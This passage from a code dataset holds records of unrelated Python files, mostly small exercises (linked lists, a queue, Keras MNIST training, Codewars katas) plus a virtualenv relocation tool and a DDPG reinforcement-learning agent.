%H:%M'), i[1])\n 
","sub_path":"Python/2018-2019/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"383073956","text":"def canReach(x1, y1, x2, y2):\n pairs = [(x1, y1)]\n while len(pairs) > 0:\n key, value = pairs[0]\n pairs = pairs[1:]\n if key == x2 and value == y2:\n return \"YES\"\n s = key+value\n if s <=x2:\n pairs.append((s, value))\n if s <= y2:\n pairs.append((key, s))\n\n return \"NO\"\n\nprint(canReach(1,1,1000,1000))","sub_path":"HackerRank/canReach.py","file_name":"canReach.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"214042481","text":"'''\n * @desc : cnn训练mnist\n * @auth : TYF\n * @date : 2019/8/24 - 23:55\n'''\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom keras.datasets import mnist\nfrom keras.utils import np_utils\nfrom keras.layers import Dense,Dropout,Flatten,Conv2D,MaxPooling2D\nfrom keras.models import Sequential\nnp.random.seed(10)\n\n#数据预处理\n(x_train,y_train),(x_test,y_test) = mnist.load_data();\nprint('x_train.shape():',x_train.shape)\n#张量 60000*28*28 转 60000*28*28*1\nx_train_4d = x_train.reshape(x_train.shape[0],28,28,1).astype('float32');\nx_test_4d = x_test.reshape(x_test.shape[0],28,28,1).astype('float32');\nprint('x_train_4d.shape():',x_train_4d.shape)\n#标准化\nx_train_4d_normalize = x_train_4d/255;\nx_test_4d_normalize = x_test_4d/255;\n#label转onehot编码\ny_train_onehot = np_utils.to_categorical(y_train);\ny_test_onehot = np_utils.to_categorical(y_test);\n\n#拼接网络\nmodel = Sequential()\n# 16个5x5卷积核 relu激活函数\nmodel.add(Conv2D(filters=16,kernel_size=(5,5),padding='same',input_shape=(28,28,1),activation='relu'))\n# 2x2的下采样窗口\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n# 36个5x5卷积核 relu激活函数\nmodel.add(Conv2D(filters=36,kernel_size=(5,5),padding='same',activation='relu'))\n# 
2x2的下采样窗口\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n# dropout层防止过拟合\nmodel.add(Dropout(0.25))\n# 平坦层压成1维 1764个神经元\nmodel.add(Flatten())\n# 隐层128个神经元\nmodel.add(Dense(units=128,activation='relu'))\n# dropout层防止过拟合\nmodel.add(Dropout(0.5))\n# 输出层softmax将类别映射为概率\nmodel.add(Dense(units=10,activation='softmax'))\nprint(model.summary())\n\n#训练\n# categorical_crossentropy/交叉熵作为损失函数 adam优化器加速收敛 accuracy(准确率)作为模型评分方式\nmodel.compile(loss='categorical_crossentropy',optimizer='adam',metrics=['accuracy'])\n# 4/5训练集 1/5验证集\ntrain_history = model.fit(x=x_train_4d_normalize,y=y_train_onehot,validation_split=0.2,epochs=20,batch_size=300,verbose=2)\n\n\n#图像显示训练结果\ndef show_train_history(train_history,train,validation):\n plt.plot(train_history.history[train]) #train(训练准确率)这条线\n plt.plot(train_history.history[validation]) #validation(验证准确率)这条线\n plt.title('train history')\n plt.ylabel(train)\n plt.xlabel('Epoch')\n plt.legend(['train','validation'],loc='upper left')\n plt.show()\n\n#训练集准确率/验证集准确率\nshow_train_history(train_history,'acc','val_acc')\n#训练集误差/验证集误差\nshow_train_history(train_history,'loss','val_loss')\n#测试集合准确率\nscores = model.evaluate(x_test_4d_normalize,y_test_onehot)\nprint('scores:',scores[1])\n\n\n#预测\nprediction = model.predict_classes(x_test_4d_normalize)\nfor i in range(1,len(y_test)):\n print('predict:',prediction[i],'label:',y_test[i])\n\n\n#混淆矩阵\nprint(pd.crosstab(y_test,prediction,rownames=['label'],colnames=['predict']))","sub_path":"src/t_2.py","file_name":"t_2.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"61127346","text":"def format_duration(seconds):\n __years = seconds // 31536000\n __days = (seconds // 86400) % 365\n __hours = (seconds // 3600) % 24\n __minutes = (seconds // 60) % 60\n __seconds = seconds % 60\n\n time = {\"years\": __years, \"days\": __days, \"hours\": __hours,\"minutes\": __minutes, \"seconds\": __seconds}\n time_list = []\n for t 
in time:\n if time[t] != 0:\n time_list.append(words_ending(t,time[t]))\n return words_concate(time_list)\n\n#Detecting words ending.\ndef words_ending(key,value):\n if value > 1:\n stroke = \" \".join([str(value),key])\n else:\n stroke = \" \".join([str(value),key[:-1]])\n return stroke\n\n#Concating result list with ',' and 'and' separators or returning now if list is empty.\ndef words_concate(result_list):\n if len(result_list) > 2:\n temp_stroke = \", \".join(result_list[:-1])\n stroke = \" and \".join([temp_stroke,result_list[-1]])\n elif len(result_list) == 2:\n stroke = \" and \".join(result_list)\n elif len(result_list) == 1:\n stroke = result_list[-1]\n else:\n stroke = \"now\"\n return stroke\n\nprint(format_duration(120))","sub_path":"Codewars/codewarsDurationFormat.py","file_name":"codewarsDurationFormat.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"314380770","text":"# create a function that takes in a file as an argument\n# create a blank dictionary\n# split the lines into indices\n# store the indices into a dictionary\n# return sorted dictionary\n\n\n\"\"\"Restaurant rating lister.\"\"\"\n\n\n# put your code here\ndef restaurant_ratings(filename):\n \"\"\"Takes in a file and allows the user to manipulate the data,\n either displaying an ordered list of restaurants or adding a new one to\n the list\"\"\"\n the_file = open(filename)\n ratings = {}\n\n for line in the_file:\n line = line.rstrip()\n split_line = line.split(\":\")\n restaurant_name, rating = split_line\n ratings[restaurant_name] = rating\n\n while True:\n ratings = {}\n\n for line in the_file:\n line = line.rstrip()\n split_line = line.split(\":\")\n restaurant_name, rating = split_line\n ratings[restaurant_name] = rating\n \n initial_input = input(\"\"\"Would you like to:\n\n [S]ee all ratings\n [A]dd a rating\n [Q]uit\n\n > \"\"\")\n if initial_input == \"S\":\n sorted_ratings = 
sorted(ratings)\n for restaurant in sorted_ratings:\n print(f\"{restaurant} is rated at {ratings[restaurant]}\")\n elif initial_input == \"A\":\n user_restaurant = input(\"Input restaurant to rate: \")\n user_rating = input(\"Input rating: \")\n if user_rating in range(1,6):\n ratings[user_restaurant] = user_rating\n else:\n print(\"Rating must be a number from 1 to 5.\")\n elif initial_input == \"Q\":\n break\n \n the_file.close()\n\nrestaurant_ratings(\"scores.txt\")\n","sub_path":"ratings.py","file_name":"ratings.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"340591385","text":"from django.urls import path\r\n\r\nfrom . import views\r\n\r\napp_name = 'puppetodo'\r\nurlpatterns = [\r\n path('', views.Index.as_view(), name='index'),\r\n path('settings/', views.Settings.as_view(), name='settings'),\r\n path('task/mapping/', views.TaskMapping.as_view(), name='mapping'),\r\n path('task/mapping/create/', views.CreateTaskMapping.as_view(), name='create_mapping'),\r\n path('task/mapping/delete//', views.DeleteTaskMapping.as_view(), name='delete_mapping'),\r\n path('task/schedule/', views.TaskSchedule.as_view(), name='schedule'),\r\n path('task/schedule/create/', views.CreateTaskSchedule.as_view(), name='create_schedule'),\r\n path('task/loop/', views.TaskLoop.as_view(), name='loop'),\r\n path('data/reload/', views.DataReload.as_view(), name='reload'),\r\n]","sub_path":"puppetodo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"459713288","text":"#Deleting Last node\n#Node Class\nclass node:\n\tdef _init_(self,data):\n\t\tself.data = data\n\t\tself.next = None\n#Linked list class\nclass LinkedList:\n\tdef _init_(self):\n\t\tself.head = None\n\t\tself.tail = None\n\t#adding elements\n\tdef append(self,data):\n\t\tnew_node = node(data)\n\t\tif 
self.head == None or self.tail == None:\n\t\t\tself.head = new_node\n\t\t\tself.tail = new_node\n\t\telse:\n\t\t\tself.tail.next = new_node\n\t\t\tself.tail = new_node\n\t#printing elements\n\tdef display(self):\n\t\tele = []\n\t\ttemp = self.head\n\t\twhile temp:\n\t\t\tele.append(temp.data)\n\t\t\ttemp = temp.next\n\t\tprint(\"Linked List: \",ele)\n\t#deleting last node function\n\tdef deleteLastNode(self):\n\t\ttemp = self.head\n\t\tpre_node = None\n\t\tprint(\"Tail Node:\",self.tail.data)\n\t\twhile temp:\n\t\t\tif temp == self.tail:\t\t\t\t\n\t\t\t\tpre_node.next = None\n\t\t\tpre_node = temp\n\t\t\ttemp = temp.next\n\nLL = LinkedList()\nn = int(input(\"Enter number of elements: \"))\nprint(\"Enter elements: \")\nfor i in range(n):\n\tk = int(input())\n\tLL.append(k)\n\nprint(\"Before: \")\nLL.display()\n\nLL.deleteLastNode()\nprint(\"New: \")\nLL.display()\n","sub_path":"L7-DelLastNode.py","file_name":"L7-DelLastNode.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"617173794","text":"import socket\n\n\nhost = 'localhost'\nport = 7070\nbufsize = 4096\naddr = (host, port)\n\nif __name__ == '__main__':\n client_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n host = input(\"Type hostname: \") or host\n port = input(\"Type portnumber: \") or port\n addr = (host, port)\n\n client_sock.connect(addr)\n payload = 'GET TIME'\n\n try:\n while True:\n client_sock.send(payload.encode('utf-8'))\n data = client_sock.recv(bufsize)\n if not data:\n break\n print(repr(data))\n more = input(\"Want more?(y/n) \")\n if more.lower() == \"y\":\n payload = input(\"Type Command: \")\n else:\n break\n except:\n print(\"Something went wrong\")\n\n 
client_sock.close()\n","sub_path":"excss/resources/socket-practice/socket_client.py","file_name":"socket_client.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"509196040","text":"import math\n\n## 1. The volume of a sphere with radius r is 4/3 pi 3.\n## What is the volume of a sphere with radius 5?\n\ndef sphere_volume(radius):\n volume = (4 * math.pi * radius ** 3) / 3\n return volume\nprint(sphere_volume(5))\n\n'''\nOutput:\n523.598775598\n'''\n\n\n## 2. Suppose the cover price of a book is $24.95, but bookstores\n## get a 40% discount. Shipping costs $3 for the first copy and 75 cents\n## for each additional copy. What is the total wholesale cost for 60 copies?\n\ndef book_price(price, copies, disc, ship_1st, ship_rest):\n shipping = ship_1st + (copies - 1) * ship_rest\n price_disc = (1 - disc) * price\n whole_cost = copies * price_disc + shipping\n return whole_cost\nprint(book_price(24.95, 60, 0.40, 3, 0.75))\n\n'''\nOutput:\n945.45\n'''\n\n\n## 3. If I leave my house at 6:52 am and run 1 mile at an easy pace\n## (8:15 per mile), then 3 miles at tempo (7:12 per mile) and 1 mile\n## at easy pace again, what time do I get home for breakfast? 
\n\ndef round_time(miles, minutes, seconds):\n # Calculate seconds each round takes.\n all_sec = 60 * minutes + seconds\n round_sec = miles * all_sec\n return round_sec\n\ndef run_time(start_hr, start_min, rounds):\n # Calculate all times in smallest unit necessary (seconds).\n seconds = 3600 * start_hr + 60 * start_min\n for round in rounds:\n seconds += round_time(round[0], round[1], round[2])\n minutes = math.floor(seconds/60)\n time = divmod(minutes, 60)\n return time\n\nbreakfast = run_time(6, 52, [[1, 8, 15], [3, 7, 12], [1, 8, 15]])\nhour = str(int(breakfast[0]))\nminute = str(int(breakfast[1]))\nprint(hour + ':' + minute)\n\n'''\nOutput:\n7:30\n'''\n","sub_path":"d0009e/lit-thinkpython/chapter2/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"526621790","text":"class Queue():\n def __init__(self):\n self.length = 10 ** 6\n self.q_list = [None] * (self.length + 1)\n self.head = 0\n self.tail = 0\n \n def enqueue(self, x):\n if self.is_full():\n# print('is_full')\n raise Exception\n# print('exec enqueue')\n self.q_list[self.tail] = x\n if self.tail == self.length - 1:\n self.tail = 0\n else:\n self.tail += 1\n \n def dequeue(self):\n if self.is_empty():\n raise Exception\n x = self.q_list[self.head]\n if self.head == self.length - 1:\n self.head = 0\n else:\n self.head += 1\n return x\n \n def is_empty(self):\n if self.head == self.tail:\n return True\n else:\n return False\n \n def is_full(self):\n# print('head', self.head, 'tail', self.tail)\n if self.head == self.tail + 1 or (self.head == 0 and self.tail == self.length-1):\n return True\n else:\n return False","sub_path":"data_structure/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"424948371","text":"#!/usr/bin/env python\n\"\"\"\n 
move-virtualenv\n ~~~~~~~~~~~~~~~\n\n A helper script that moves virtualenvs to a new location.\n\n It only supports POSIX based virtualenvs and at the moment.\n\n :copyright: (c) 2012 by Fireteam Ltd.\n :license: BSD, see LICENSE for more details.\n\"\"\"\nfrom __future__ import annotations\n\nimport argparse\nimport marshal\nimport os.path\nimport re\nimport shutil\nimport sys\nfrom types import CodeType\nfrom typing import NamedTuple\nfrom typing import Sequence\n\n\nACTIVATION_SCRIPTS = [\n 'activate',\n 'activate.csh',\n 'activate.fish',\n 'activate.xsh',\n]\n_pybin_match = re.compile(r'^python\\d+\\.\\d+$')\n_pypy_match = re.compile(r'^pypy\\d+.\\d+$')\n_activation_path_re = re.compile(\n r'^(?:set -gx |setenv |)VIRTUAL_ENV[ =][\\'\"](.*?)[\\'\"]\\s*$',\n)\nVERBOSE = False\n# magic length\n# + 4 byte timestamp\n# + 4 byte \"size\" hint was added to pyc files\n# PEP 552 (implemented in python 3.7) extends this by another word\nMAGIC_LENGTH = 4 + 4 + 4 + 4\n\n\ndef debug(msg: str) -> None:\n if VERBOSE:\n print(msg)\n\n\ndef update_activation_script(script_filename: str, new_path: str) -> None:\n \"\"\"Updates the paths for the activate shell scripts.\"\"\"\n with open(script_filename) as f:\n lines = list(f)\n\n def _handle_sub(match: re.Match[str]) -> str:\n text = match.group()\n start, end = match.span()\n g_start, g_end = match.span(1)\n return text[:(g_start - start)] + new_path + text[(g_end - end):]\n\n changed = False\n for idx, line in enumerate(lines):\n new_line = _activation_path_re.sub(_handle_sub, line)\n if line != new_line:\n lines[idx] = new_line\n changed = True\n\n if changed:\n debug('A %s' % script_filename)\n with open(script_filename, 'w') as f:\n f.writelines(lines)\n\n\ndef path_is_within(path: bytes, within: bytes) -> bool:\n relpath = os.path.relpath(path, within)\n return not relpath.startswith(b'.')\n\n\ndef update_script(\n script_filename: str,\n old_path_s: str,\n new_path_s: str,\n) -> None:\n \"\"\"Updates shebang lines for 
actual scripts.\"\"\"\n filesystem_encoding = sys.getfilesystemencoding()\n old_path = old_path_s.encode(filesystem_encoding)\n new_path = new_path_s.encode(filesystem_encoding)\n\n with open(script_filename, 'rb') as f:\n if f.read(2) != b'#!':\n return\n f.seek(0)\n lines = list(f)\n\n # is this a python script being run under a bourne exec call\n if (\n len(lines) >= 2 and\n lines[0] == b'#!/bin/sh\\n' and\n lines[1].startswith(b\"'''exec' \")\n ):\n args = lines[1].strip().split()\n\n if path_is_within(args[1], old_path):\n new_bin = os.path.join(\n new_path,\n os.path.relpath(args[1], old_path)\n )\n else:\n return\n\n args[1] = new_bin\n lines[1] = b' '.join(args) + b'\\n'\n else:\n args = lines[0][2:].strip().split()\n\n if not args:\n return\n\n if path_is_within(args[0], old_path):\n new_bin = os.path.join(\n new_path,\n os.path.relpath(args[0], old_path)\n )\n else:\n return\n\n args[0] = new_bin\n lines[0] = b'#!' + b' '.join(args) + b'\\n'\n\n debug('S %s' % script_filename)\n with open(script_filename, 'wb') as f:\n f.writelines(lines)\n\n\ndef update_scripts(\n bin_dir: str,\n orig_path: str,\n new_path: str,\n activation: bool = False,\n) -> None:\n \"\"\"Updates all scripts in the bin folder.\"\"\"\n for fname in os.listdir(bin_dir):\n path = os.path.join(bin_dir, fname)\n if fname in ACTIVATION_SCRIPTS and activation:\n update_activation_script(path, new_path)\n elif os.path.isfile(path):\n update_script(path, orig_path, new_path)\n\n\ndef update_pyc(filename: str, new_path: str) -> None:\n \"\"\"Updates the filenames stored in pyc files.\"\"\"\n with open(filename, 'rb') as rf:\n magic = rf.read(MAGIC_LENGTH)\n try:\n code = marshal.load(rf)\n except Exception:\n print('Error in %s' % filename)\n raise\n\n def _process(code: CodeType) -> CodeType:\n consts = []\n for const in code.co_consts:\n if type(const) is CodeType:\n const = _process(const)\n consts.append(const)\n if new_path != code.co_filename or consts != list(code.co_consts):\n code = 
code.replace(co_filename=new_path, co_consts=tuple(consts))\n return code\n\n new_code = _process(code)\n\n if new_code is not code:\n debug('B %s' % filename)\n with open(filename, 'wb') as wf:\n wf.write(magic)\n marshal.dump(new_code, wf)\n\n\ndef update_pycs(lib_dir: str, new_path: str) -> None:\n \"\"\"Walks over all pyc files and updates their paths.\"\"\"\n def get_new_path(filename: str) -> str:\n filename = os.path.normpath(filename)\n return os.path.join(new_path, filename[len(lib_dir) + 1:])\n\n for dirname, dirnames, filenames in os.walk(lib_dir):\n for filename in filenames:\n if (\n filename.endswith(('.pyc', '.pyo')) and\n # python 2, virtualenv 20.x symlinks os.pyc\n not os.path.islink(os.path.join(dirname, filename))\n ):\n filename = os.path.join(dirname, filename)\n local_path = get_new_path(filename)\n update_pyc(filename, local_path)\n\n\ndef _update_pth_file(pth_filename: str, orig_path: str) -> None:\n with open(pth_filename) as f:\n lines = f.readlines()\n changed = False\n for i, line in enumerate(lines):\n val = line.strip()\n if val.startswith('import ') or not os.path.isabs(val):\n continue\n changed = True\n relto_original = os.path.relpath(val, orig_path)\n # If we are moving a pypy venv the site-packages directory\n # is in a different location than if we are moving a cpython venv\n relto_pth = os.path.join(\n '../../..', # venv/lib/pythonX.X/site-packages\n relto_original\n )\n lines[i] = f'{relto_pth}\\n'\n if changed:\n with open(pth_filename, 'w') as f:\n f.write(''.join(lines))\n debug(f'P {pth_filename}')\n\n\ndef update_pth_files(site_packages: str, orig_path: str) -> None:\n \"\"\"Converts /full/paths in pth files to relative relocatable paths.\"\"\"\n for filename in os.listdir(site_packages):\n filename = os.path.join(site_packages, filename)\n if filename.endswith('.pth') and os.path.isfile(filename):\n _update_pth_file(filename, orig_path)\n\n\ndef remove_local(base: str) -> None:\n \"\"\"On some systems virtualenv seems 
to have something like a local\n directory with symlinks. This directory is safe to remove in modern\n versions of virtualenv. Delete it.\n \"\"\"\n local_dir = os.path.join(base, 'local')\n if os.path.exists(local_dir): # pragma: no cover (not all systems)\n debug(f'D {local_dir}')\n shutil.rmtree(local_dir)\n\n\ndef update_paths(venv: Virtualenv, new_path: str) -> None:\n \"\"\"Updates all paths in a virtualenv to a new one.\"\"\"\n update_scripts(venv.bin_dir, venv.orig_path, new_path)\n for lib_dir in venv.lib_dirs:\n update_pycs(lib_dir, new_path)\n update_pth_files(venv.site_packages, venv.orig_path)\n remove_local(venv.path)\n update_scripts(venv.bin_dir, venv.orig_path, new_path, activation=True)\n\n\ndef get_orig_path(venv_path: str) -> str:\n \"\"\"This helps us know whether someone has tried to relocate the\n virtualenv\n \"\"\"\n activate_path = os.path.join(venv_path, 'bin/activate')\n\n with open(activate_path) as activate:\n for line in activate:\n # virtualenv 20 changes the position\n for possible in ('VIRTUAL_ENV=\"', \"VIRTUAL_ENV='\"):\n if line.startswith(possible):\n return line.split(possible[-1], 2)[1]\n else:\n raise AssertionError(\n 'Could not find VIRTUAL_ENV= in activation script: %s' %\n activate_path\n )\n\n\nclass NotAVirtualenvError(ValueError):\n def __str__(self) -> str:\n return '{} is not a virtualenv: not a {}: {}'.format(*self.args)\n\n\nclass Virtualenv(NamedTuple):\n path: str\n bin_dir: str\n lib_dirs: list[str]\n site_packages: str\n orig_path: str\n\n\ndef _get_original_state(path: str) -> Virtualenv:\n is_pypy = os.path.isfile(os.path.join(path, 'bin', 'pypy'))\n bin_dir = os.path.join(path, 'bin')\n base_lib_dir = os.path.join(path, 'lib')\n activate_file = os.path.join(bin_dir, 'activate')\n\n for dir_path in (bin_dir, base_lib_dir):\n if not os.path.isdir(dir_path):\n raise NotAVirtualenvError(path, 'directory', dir_path)\n if not os.path.isfile(activate_file):\n raise NotAVirtualenvError(path, 'file', 
activate_file)\n\n matcher = _pypy_match if is_pypy else _pybin_match\n lib_dirs = [\n os.path.join(base_lib_dir, potential_lib_dir)\n for potential_lib_dir in os.listdir(base_lib_dir)\n if matcher.match(potential_lib_dir)\n ]\n if len(lib_dirs) != 1:\n raise NotAVirtualenvError(\n path,\n 'directory',\n os.path.join(base_lib_dir, 'pypy#.#)' if is_pypy else 'python#.#'),\n )\n lib_dir, = lib_dirs\n\n site_packages = os.path.join(lib_dir, 'site-packages')\n if not os.path.isdir(site_packages):\n raise NotAVirtualenvError(path, 'directory', site_packages)\n\n return Virtualenv(\n path=path,\n bin_dir=bin_dir,\n lib_dirs=[lib_dir],\n site_packages=site_packages,\n orig_path=get_orig_path(path),\n )\n\n\ndef main(argv: Sequence[str] | None = None) -> int:\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--update-path',\n required=True,\n help=(\n 'Update the path for all required executables and helper files '\n 'that are supported to the new python prefix. You can also set '\n 'this to \"auto\" for autodetection.'\n ),\n )\n parser.add_argument(\n '--verbose', action='store_true', help='show a listing of changes',\n )\n parser.add_argument('path', default='.', nargs='?')\n args = parser.parse_args(argv)\n\n global VERBOSE\n VERBOSE = args.verbose\n\n if args.update_path == 'auto':\n update_path = os.path.abspath(args.path)\n else:\n update_path = args.update_path\n\n if not os.path.isabs(update_path):\n print(f'--update-path must be absolute: {update_path}')\n return 1\n\n try:\n venv = _get_original_state(path=args.path)\n except NotAVirtualenvError as e:\n print(e)\n return 1\n\n if venv.orig_path == update_path:\n print(f'Already up-to-date: {venv.path} ({update_path})')\n return 0\n\n update_paths(venv, update_path)\n print(f'Updated: {venv.path} ({venv.orig_path} -> {update_path})')\n return 0\n\n\nif __name__ == '__main__':\n raise 
SystemExit(main())\n","sub_path":"virtualenv_tools.py","file_name":"virtualenv_tools.py","file_ext":"py","file_size_in_byte":11141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"469313551","text":"# Learning from advice with auxiliary incentive.\nfrom rltk.common.maths import polyak_averaging\nfrom .ddpg import DDPG, TD3\nimport torch\nimport random\nimport numpy as np\n\n\nclass DDPG_LEA(DDPG):\n def __init__(\n self,\n library,\n pi_reuse,\n reuse: bool = True,\n num_commit: int = 1,\n lam_pi_guidance: float = 0.001,\n use_pi_guidance: bool = False,\n use_q_guidance: bool = False,\n lam_aux_policy_guidance: float = 0.001,\n aux_policy_guidance_version: int = 0,\n *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n self.library = library\n self.library.append(self.targets.actor)\n self.reuse = reuse\n self.pi_reuse = pi_reuse\n self.num_commit = num_commit\n self.index_commit = None\n # When the agent reuse advice it should commit to the advisor\n # during a number 'num_commit' times.\n self.in_reuse_mode = False\n self.last_n_commint = self.num_commit\n self.use_q_guidance = use_q_guidance\n self.use_pi_guidance = use_pi_guidance\n self.lam_pi_guidance = lam_pi_guidance\n self.count_advice = np.zeros(len(self.library))\n self.lam_aux_policy_guidance = lam_aux_policy_guidance\n self.aux_policy_guidance_version = aux_policy_guidance_version\n\n def act(self, obses, mode: str = \"train\"):\n if mode == \"train\" and self.in_reuse_mode and self.reuse:\n with torch.no_grad():\n self.last_n_commint -= 1\n action = self.library[self.index_commit](obses).cpu().numpy()\n action = np.clip(action, -1, 1)\n # Increment the count of played advice\n self.count_advice[self.index_commit] += 1\n if self.last_n_commint == 0:\n self.index_commit = None\n self.in_reuse_mode = False\n self.last_n_commint = self.num_commit\n return action, {}\n if (not self.in_reuse_mode and random.random() >= self.pi_reuse) or (\n not 
mode == \"train\" or not self.reuse\n ):\n if mode == \"train\":\n # Student policy is played.\n self.count_advice[-1] += 1\n return super().act(obses, mode=mode)\n\n if not self.reuse:\n raise ValueError()\n\n advice = [advisor(obses) for advisor in self.library]\n action, index = self.filter(obses, advice)\n self.in_reuse_mode = True\n self.index_commit = index\n action = np.clip(action, -1, 1)\n self.count_advice[self.index_commit] += 1\n return action, {}\n\n @torch.no_grad()\n def filter(self, x, advice):\n # NOTE: MERGE\n if len(x.shape) == 1:\n index = torch.argmax(\n torch.cat([self.targets.critic(x, a) for a in advice])\n ).item()\n return advice[index].detach().cpu().numpy(), index\n q = torch.stack([self.targets.critic(x, a) for a in advice])\n index = torch.argmax(q, dim=0)\n advice = torch.stack(advice)\n best_advice = advice[index.squeeze(-1), range(advice.shape[1])]\n return best_advice, index\n\n def update(self, obses, action, reward, mask, next_obses):\n loss_actor = self.learn_actor(obses)\n loss_critic = self.learn_critic(obses, reward, action, mask, next_obses)\n\n self.optims.critic.zero_grad()\n loss_critic.backward()\n if self.max_grad_norm > 0.0:\n torch.nn.utils.clip_grad_norm_(\n self.models.critic.parameters(), self.max_grad_norm, norm_type=2\n )\n self.optims.critic.step()\n\n self.optims.actor.zero_grad()\n loss_actor.backward()\n if self.max_grad_norm > 0.0:\n torch.nn.utils.clip_grad_norm_(\n self.models.actor.parameters(), self.max_grad_norm, norm_type=2\n )\n self.optims.actor.step()\n for k, v in self.targets.items():\n polyak_averaging(self.models[k], v, tau=self.polyak)\n\n def learn_critic(self, obses, reward, action, mask, next_obses):\n with torch.no_grad():\n if not self.use_q_guidance:\n next_action = self.targets.actor(next_obses)\n else:\n advice = [advisor(next_obses) for advisor in self.library]\n next_action, _ = self.filter(next_obses, advice)\n next_qfunc = self.targets.critic(next_obses, next_action)\n target = 
reward + self.gamma * mask * next_qfunc.squeeze(1)\n qfunc = self.models.critic(obses, action).squeeze(1)\n assert target.shape == qfunc.shape\n loss = (qfunc - target).pow(2).mean().mul(0.5)\n if self.logger is not None:\n self.logger.store(loss_critic=np.round(loss.item(), 3))\n return loss\n\n def learn_actor(self, obses):\n action = self.models.actor(obses)\n action_penalty = self.action_penalty_lam * action.pow(2).mean()\n q_sa = self.models.critic(obses, action)\n loss = q_sa.mean().neg()\n loss += action_penalty\n # Auxiliary Incentive to surpass Experts. --------------------------------------\n if self.use_q_guidance:\n advice = [advisor(obses) for advisor in self.library]\n if self.aux_policy_guidance_version == 0:\n q_sa = torch.stack([self.targets.critic(obses, a) for a in advice])\n q_sa_max = torch.max(q_sa, dim=0)[0]\n loss = loss + self.lam_aux_policy_guidance * (q_sa - q_sa_max).pow(2).mean()\n elif self.lam_aux_policy_guidance == 1:\n raise # APPLY WITH SOFTMAX\n q_sa = torch.stack([self.targets.critic(obses, a) for a in advice])\n q_sa_max = torch.max(q_sa, dim=0)[0]\n loss = loss + self.lam_aux_policy_guidance * (q_sa - q_sa_max).pow(2).mean()\n else:\n raise NotImplementedError()\n # -------------------------------------------------------------------------------\n if self.use_pi_guidance:\n advice = [advisor(obses) for advisor in self.library]\n best_advice, index = self.filter(obses, advice)\n loss_pi_guidance = self.lam_pi_guidance * \\\n (action - best_advice).sum().pow(2).mul(0.5)\n assert loss.shape == loss_pi_guidance.shape\n loss = loss + loss_pi_guidance\n if self.logger is not None:\n self.logger.store(loss_pi_guidance=np.round(loss_pi_guidance.item(), 3))\n if self.logger is not None:\n self.logger.store(loss_actor=np.round(loss.item(), 3))\n return 
loss\n","sub_path":"rl/lea_v2.py","file_name":"lea_v2.py","file_ext":"py","file_size_in_byte":6719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"140363192","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def removeNthFromEnd(self, head, n):\n \"\"\"\n :type head: ListNode\n :type n: int\n :rtype: ListNode\n \"\"\"\n N = [n]\n head = self.recursiveFindAndRemove(head, N)\n return head\n\n def recursiveFindAndRemove(self, head, N):\n if not head: return head\n head.next = self.recursiveFindAndRemove(head.next, N)\n N[0]-=1\n return head.next if N[0]==0 else head\n","sub_path":"Leetcode/linkedlist/19_Remove Nth Node from End of List/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"164503353","text":"#!/usr/bin/python\n#\\file terminal_tab5a.py\n#\\brief Test of using the library terminal_tab5lib.py;\n#\\author Akihiko Yamaguchi, info@akihikoy.net\n#\\version 0.1\n#\\date Sep.10, 2017\n\nfrom terminal_tab5lib import RunTerminalTab\n\nif __name__=='__main__':\n E= 'Enter'\n terminals= [\n ('main1',[\n ('Init',[':all','ros',E,'norobot',E]),\n ('Exit',':close') ]),\n ('rviz',[\n (':pair', ('rviz',['rviz',E]),\n ('kill',['C-c']) ) ]),\n ('s2',[\n ('ls',('ls',E)),\n ('nodes',['rostopic list',E]),\n ('topics',['rosnode list',E]) ]),\n ]\n exit_command= [E,'C-c']\n RunTerminalTab('Test Launcher',terminals,exit_command)\n","sub_path":"python/qt/terminal_tab/terminal_tab5a.py","file_name":"terminal_tab5a.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"624764963","text":"from .english_corpus import EnglishCorpus\n\n\nclass CLTKCorpus(EnglishCorpus):\n\n def lemmatize(self, 
